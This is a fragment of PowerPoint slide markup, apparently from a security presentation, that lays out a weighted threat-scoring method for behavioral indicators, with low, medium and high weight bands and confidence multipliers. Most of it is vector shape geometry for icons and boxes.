                  <a:pt x="32126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2" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6388954" y="6775378"/>
            <a:ext cx="126498" cy="112443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="126498" h="112443">
                <a:moveTo>
                  <a:pt x="49194" y="54464"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="63739" y="54464"/>
                  <a:pt x="75547" y="42656"/>
                  <a:pt x="75547" y="28111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="75547" y="13566"/>
                  <a:pt x="63739" y="1757"/>
                  <a:pt x="49194" y="1757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34649" y="1757"/>
                  <a:pt x="22840" y="13566"/>
                  <a:pt x="22840" y="28111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22840" y="42656"/>
                  <a:pt x="34649" y="54464"/>
                  <a:pt x="49194" y="54464"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="42671" y="66763"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21039" y="66763"/>
                  <a:pt x="3514" y="84288"/>
                  <a:pt x="3514" y="105920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3514" y="109522"/>
                  <a:pt x="6435" y="112443"/>
                  <a:pt x="10036" y="112443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65269" y="112443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57319" y="103087"/>
                  <a:pt x="52708" y="91030"/>
                  <a:pt x="52708" y="78271"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52708" y="71441"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="52708" y="69837"/>
                  <a:pt x="52927" y="68256"/>
                  <a:pt x="53344" y="66763"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42671" y="66763"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="97794" y="107282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="94874" y="108665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94874" y="67356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115957" y="74383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115957" y="78688"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="115957" y="90942"/>
                  <a:pt x="108885" y="102077"/>
                  <a:pt x="97794" y="107304"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="92655" y="56990"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="68059" y="65182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="65182" y="66148"/>
                  <a:pt x="63249" y="68827"/>
                  <a:pt x="63249" y="71858"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63249" y="78688"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63249" y="95027"/>
                  <a:pt x="72692" y="109895"/>
                  <a:pt x="87451" y="116835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91513" y="118746"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92568" y="119229"/>
                  <a:pt x="93710" y="119492"/>
                  <a:pt x="94852" y="119492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95994" y="119492"/>
                  <a:pt x="97158" y="119229"/>
                  <a:pt x="98190" y="118746"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="102253" y="116835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117055" y="109873"/>
                  <a:pt x="126498" y="95005"/>
                  <a:pt x="126498" y="78666"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="126498" y="71836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="126498" y="68805"/>
                  <a:pt x="124565" y="66126"/>
                  <a:pt x="121688" y="65160"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97092" y="56968"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="95642" y="56485"/>
                  <a:pt x="94083" y="56485"/>
                  <a:pt x="92655" y="56968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3" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675080" y="6703093"/>
            <a:ext cx="2216727" cy="19275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Privilege Escalation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6675080" y="6895852"/>
            <a:ext cx="2208696" cy="16063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8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Often installed with SYSTEM-level privileges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349250"/>
            <a:ext cx="63500" cy="508000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="63500" h="508000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="317500"/>
            <a:ext cx="380206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kern="0" spc="100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Framework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571500"/>
            <a:ext cx="388143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Risk Calculation Methodology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016000"/>
            <a:ext cx="11437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Algorithm that converts behavioral indicators into actionable threat intelligence with confidence scoring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33375" y="1365250"/>
            <a:ext cx="7286625" cy="2222500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7286625" h="2222500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7286625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7286625" y="2222500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="222250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333375" y="1365250"/>
            <a:ext cx="31750" cy="2222500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="2222500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="2222500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22225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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515938" y="1524000"/>
            <a:ext cx="119063" cy="158750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="119063" h="158750">
                <a:moveTo>
                  <a:pt x="19844" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8899" y="0"/>
                  <a:pt x="0" y="8899"/>
                  <a:pt x="0" y="19844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="138906"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="149851"/>
                  <a:pt x="8899" y="158750"/>
                  <a:pt x="19844" y="158750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99219" y="158750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110164" y="158750"/>
                  <a:pt x="119062" y="149851"/>
                  <a:pt x="119062" y="138906"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="119062" y="19844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119062" y="8899"/>
                  <a:pt x="110164" y="0"/>
                  <a:pt x="99219" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19844" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29766" y="19844"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89297" y="19844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="94785" y="19844"/>
                  <a:pt x="99219" y="24278"/>
                  <a:pt x="99219" y="29766"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99219" y="39688"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99219" y="45176"/>
                  <a:pt x="94785" y="49609"/>
                  <a:pt x="89297" y="49609"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29766" y="49609"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24278" y="49609"/>
                  <a:pt x="19844" y="45176"/>
                  <a:pt x="19844" y="39688"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19844" y="29766"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19844" y="24278"/>
                  <a:pt x="24278" y="19844"/>
                  <a:pt x="29766" y="19844"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="34727" y="71934"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="34727" y="76041"/>
                  <a:pt x="31392" y="79375"/>
                  <a:pt x="27285" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23178" y="79375"/>
                  <a:pt x="19844" y="76041"/>
                  <a:pt x="19844" y="71934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19844" y="67827"/>
                  <a:pt x="23178" y="64492"/>
                  <a:pt x="27285" y="64492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31392" y="64492"/>
                  <a:pt x="34727" y="67827"/>
                  <a:pt x="34727" y="71934"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59531" y="79375"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="55424" y="79375"/>
                  <a:pt x="52090" y="76041"/>
                  <a:pt x="52090" y="71934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52090" y="67827"/>
                  <a:pt x="55424" y="64492"/>
                  <a:pt x="59531" y="64492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63638" y="64492"/>
                  <a:pt x="66973" y="67827"/>
                  <a:pt x="66973" y="71934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66973" y="76041"/>
                  <a:pt x="63638" y="79375"/>
                  <a:pt x="59531" y="79375"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="99219" y="71934"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="99219" y="76041"/>
                  <a:pt x="95884" y="79375"/>
                  <a:pt x="91777" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87670" y="79375"/>
                  <a:pt x="84336" y="76041"/>
                  <a:pt x="84336" y="71934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84336" y="67827"/>
                  <a:pt x="87670" y="64492"/>
                  <a:pt x="91777" y="64492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95884" y="64492"/>
                  <a:pt x="99219" y="67827"/>
                  <a:pt x="99219" y="71934"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27285" y="109141"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="23178" y="109141"/>
                  <a:pt x="19844" y="105806"/>
                  <a:pt x="19844" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19844" y="97592"/>
                  <a:pt x="23178" y="94258"/>
                  <a:pt x="27285" y="94258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31392" y="94258"/>
                  <a:pt x="34727" y="97592"/>
                  <a:pt x="34727" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34727" y="105806"/>
                  <a:pt x="31392" y="109141"/>
                  <a:pt x="27285" y="109141"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66973" y="101699"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66973" y="105806"/>
                  <a:pt x="63638" y="109141"/>
                  <a:pt x="59531" y="109141"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55424" y="109141"/>
                  <a:pt x="52090" y="105806"/>
                  <a:pt x="52090" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52090" y="97592"/>
                  <a:pt x="55424" y="94258"/>
                  <a:pt x="59531" y="94258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63638" y="94258"/>
                  <a:pt x="66973" y="97592"/>
                  <a:pt x="66973" y="101699"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="91777" y="109141"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="87670" y="109141"/>
                  <a:pt x="84336" y="105806"/>
                  <a:pt x="84336" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84336" y="97592"/>
                  <a:pt x="87670" y="94258"/>
                  <a:pt x="91777" y="94258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95884" y="94258"/>
                  <a:pt x="99219" y="97592"/>
                  <a:pt x="99219" y="101699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99219" y="105806"/>
                  <a:pt x="95884" y="109141"/>
                  <a:pt x="91777" y="109141"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19844" y="131465"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19844" y="127341"/>
                  <a:pt x="23161" y="124023"/>
                  <a:pt x="27285" y="124023"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62012" y="124023"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="66135" y="124023"/>
                  <a:pt x="69453" y="127341"/>
                  <a:pt x="69453" y="131465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69453" y="135589"/>
                  <a:pt x="66135" y="138906"/>
                  <a:pt x="62012" y="138906"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27285" y="138906"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="23161" y="138906"/>
                  <a:pt x="19844" y="135589"/>
                  <a:pt x="19844" y="131465"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="91777" y="124023"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95901" y="124023"/>
                  <a:pt x="99219" y="127341"/>
                  <a:pt x="99219" y="131465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99219" y="135589"/>
                  <a:pt x="95901" y="138906"/>
                  <a:pt x="91777" y="138906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87654" y="138906"/>
                  <a:pt x="84336" y="135589"/>
                  <a:pt x="84336" y="131465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84336" y="127341"/>
                  <a:pt x="87654" y="124023"/>
                  <a:pt x="91777" y="12402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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674688" y="1492250"/>
            <a:ext cx="6897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Weighted Scoring Algorithm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76250" y="1809750"/>
            <a:ext cx="7016750" cy="762000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7016750" h="762000">
                <a:moveTo>
                  <a:pt x="31753" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6984997" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7002534" y="0"/>
                  <a:pt x="7016750" y="14216"/>
                  <a:pt x="7016750" y="31753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7016750" y="730247"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7016750" y="747784"/>
                  <a:pt x="7002534" y="762000"/>
                  <a:pt x="6984997" y="762000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31753" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="762000"/>
                  <a:pt x="0" y="747784"/>
                  <a:pt x="0" y="730247"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14228"/>
                  <a:pt x="14228" y="0"/>
                  <a:pt x="31753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Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1936750"/>
            <a:ext cx="6834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Composite Threat Score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603250" y="2222500"/>
            <a:ext cx="68341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Score = Σ(Indicatorᵢ × Weightᵢ) × Confidence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92125" y="2667000"/>
            <a:ext cx="2262188" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2262188" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2230438" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2247961" y="0"/>
                  <a:pt x="2262188" y="14227"/>
                  <a:pt x="2262188" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2262188" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2262188" y="779523"/>
                  <a:pt x="2247961" y="793750"/>
                  <a:pt x="2230438" y="793750"/>
                </a:cubicBez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Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492125" y="2667000"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:ln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C95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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="2762250"/>
            <a:ext cx="2111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Weight: 1-3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603250" y="2952750"/>
            <a:ext cx="2127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05DF7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LOW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03250" y="3206750"/>
            <a:ext cx="2111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Suspicious but common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2862759" y="2667000"/>
            <a:ext cx="2262188" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2262188" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2230438" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2247961" y="0"/>
                  <a:pt x="2262188" y="14227"/>
                  <a:pt x="2262188" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2262188" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2262188" y="779523"/>
                  <a:pt x="2247961" y="793750"/>
                  <a:pt x="2230438" y="793750"/>
                </a:cubicBez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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862759" y="2667000"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:ln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690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Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973884" y="2762250"/>
            <a:ext cx="2111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Weight: 4-6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2973884" y="2952750"/>
            <a:ext cx="2127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F890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MEDIUM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2973884" y="3206750"/>
            <a:ext cx="2111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Concerning patterns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233392" y="2667000"/>
            <a:ext cx="2262188" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2262188" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2230438" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2247961" y="0"/>
                  <a:pt x="2262188" y="14227"/>
                  <a:pt x="2262188" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2262188" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2262188" y="779523"/>
                  <a:pt x="2247961" y="793750"/>
                  <a:pt x="2230438" y="793750"/>
                </a:cubicBez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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233392" y="2667000"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:ln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B2C3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Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344517" y="2762250"/>
            <a:ext cx="2111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Weight: 7-10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344517" y="2952750"/>
            <a:ext cx="2127250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F646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344517" y="3206750"/>
            <a:ext cx="211137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Strong malicious indicators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20675" y="3717925"/>
            <a:ext cx="7292975" cy="4459288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7292975" h="4459288">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7292975" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7292975" y="4459288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4459288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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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9" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470694" y="3879848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2089" y="1612"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76708" y="-527"/>
                  <a:pt x="82042" y="-527"/>
                  <a:pt x="86661" y="1612"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="154440" y="32928"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157076" y="34137"/>
                  <a:pt x="158750" y="36773"/>
                  <a:pt x="158750" y="39688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158750" y="42602"/>
                  <a:pt x="157076" y="45238"/>
                  <a:pt x="154440" y="46447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86661" y="77763"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82042" y="79902"/>
                  <a:pt x="76708" y="79902"/>
                  <a:pt x="72089" y="77763"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="46447"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="45207"/>
                  <a:pt x="0" y="42571"/>
                  <a:pt x="0" y="39688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36804"/>
                  <a:pt x="1674" y="34137"/>
                  <a:pt x="4310" y="32928"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72089" y="1612"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14914" y="67717"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65856" y="91250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74445" y="95219"/>
                  <a:pt x="84336" y="95219"/>
                  <a:pt x="92925" y="91250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="143867" y="67717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154440" y="72616"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157076" y="73825"/>
                  <a:pt x="158750" y="76460"/>
                  <a:pt x="158750" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158750" y="82290"/>
                  <a:pt x="157076" y="84925"/>
                  <a:pt x="154440" y="86134"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86661" y="117450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82042" y="119590"/>
                  <a:pt x="76708" y="119590"/>
                  <a:pt x="72089" y="117450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="86134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="84894"/>
                  <a:pt x="0" y="82259"/>
                  <a:pt x="0" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="76491"/>
                  <a:pt x="1674" y="73825"/>
                  <a:pt x="4310" y="72616"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14883" y="67717"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4310" y="112303"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14883" y="107404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65825" y="130938"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74414" y="134906"/>
                  <a:pt x="84305" y="134906"/>
                  <a:pt x="92894" y="130938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="143836" y="107404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154409" y="112303"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157045" y="113512"/>
                  <a:pt x="158719" y="116148"/>
                  <a:pt x="158719" y="119062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158719" y="121977"/>
                  <a:pt x="157045" y="124613"/>
                  <a:pt x="154409" y="125822"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86630" y="157138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82010" y="159277"/>
                  <a:pt x="76677" y="159277"/>
                  <a:pt x="72058" y="157138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="125822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="124582"/>
                  <a:pt x="0" y="121946"/>
                  <a:pt x="0" y="119062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="116179"/>
                  <a:pt x="1674" y="113512"/>
                  <a:pt x="4310" y="11230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0" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649287" y="3848098"/>
            <a:ext cx="6913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Confidence Multipliers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50850" y="4165598"/>
            <a:ext cx="7032625" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7032625" h="381000">
                <a:moveTo>
                  <a:pt x="31749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7000876" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7018411" y="0"/>
                  <a:pt x="7032625" y="14214"/>
                  <a:pt x="7032625" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7032625" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
